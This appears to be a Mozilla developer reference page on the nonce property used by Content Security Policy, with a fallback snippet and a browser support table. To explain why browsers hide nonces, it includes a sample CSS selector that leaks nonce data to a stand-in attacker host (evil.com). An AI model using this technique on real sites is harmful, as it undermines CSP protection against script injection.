The nonce property of the HTMLOrForeignElement interface returns the cryptographic number used once that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.
In later implementations, elements only expose their nonce attribute to scripts (and not to side-channels like CSS attribute selectors).
Examples
Retrieving a nonce value
In the past, not all browsers supported the nonce IDL attribute, so a workaround is to try to use getAttribute as a fallback:
let nonce = script['nonce'] || script.getAttribute('nonce');
However, recent browser versions hide nonce values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']) will be the only way to access nonces.
Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes, like this CSS attribute selector:
script[nonce~=whatever] {
background: url("https://evil.com/nonce?whatever");
}
Specifications
HTML Living Standard: the definition of 'nonce' in that specification.
Browser Compatibility
Platform | Browser | nonce support (version)
---|---|---
Desktop | Chrome | 61
Desktop | Edge | 79
Desktop | Firefox | 75
Desktop | IE | No
Desktop | Opera | Yes
Desktop | Safari | 10
Mobile | WebView Android | 61
Mobile | Chrome Android | 61
Mobile | Firefox Android | No
Mobile | Opera Android | Yes
Mobile | Safari iOS | 10
Mobile | Samsung Internet Android | 8.0
HTMLOrForeignElement.nonce by Mozilla Contributors is licensed under CC-BY-SA 2.5.